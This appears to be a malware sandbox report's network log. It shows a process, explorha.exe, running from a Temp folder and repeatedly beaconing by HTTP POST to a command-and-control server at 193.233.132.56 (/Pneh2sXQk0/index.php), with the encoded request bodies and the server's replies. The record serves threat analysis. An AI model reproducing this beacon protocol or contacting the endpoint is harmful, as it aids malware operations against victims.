Apr 19, 2024 04:26:17.048388004 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:17.049362898 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:17.295758963 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:17.656404018 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:17.899472952 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:17.900146961 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:18.148781061 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:19.711950064 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:19.956800938 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:19.958012104 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:20.210747004 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49757 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:20.732207060 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:20.975307941 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:20.976015091 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:21.222774982 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49758 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:21.576457024 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:21.819334030 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:21.820146084 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:22.066276073 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:21 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49759 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:22.422744036 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:22.669987917 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:22.670697927 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:22.926723003 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    24 | 192.168.2.4 | 49760 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:23.282666922 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:23.527075052 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:23.527831078 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:23.777892113 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    25 | 192.168.2.4 | 49761 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:24.134181023 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:24.373234034 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:24.374032021 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:24.617314100 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    26 | 192.168.2.4 | 49762 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:24.967010021 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:25.209677935 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:25.210442066 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:25.457503080 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    27 | 192.168.2.4 | 49763 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:25.818444967 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:26.070641994 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:26.074642897 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:26.331816912 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    28 | 192.168.2.4 | 49764 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:26.686374903 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:26.931274891 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:26 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:26.931936979 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:27.186161041 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    29 | 192.168.2.4 | 49765 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:26:27.553057909 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:27.805710077 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:27.806471109 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
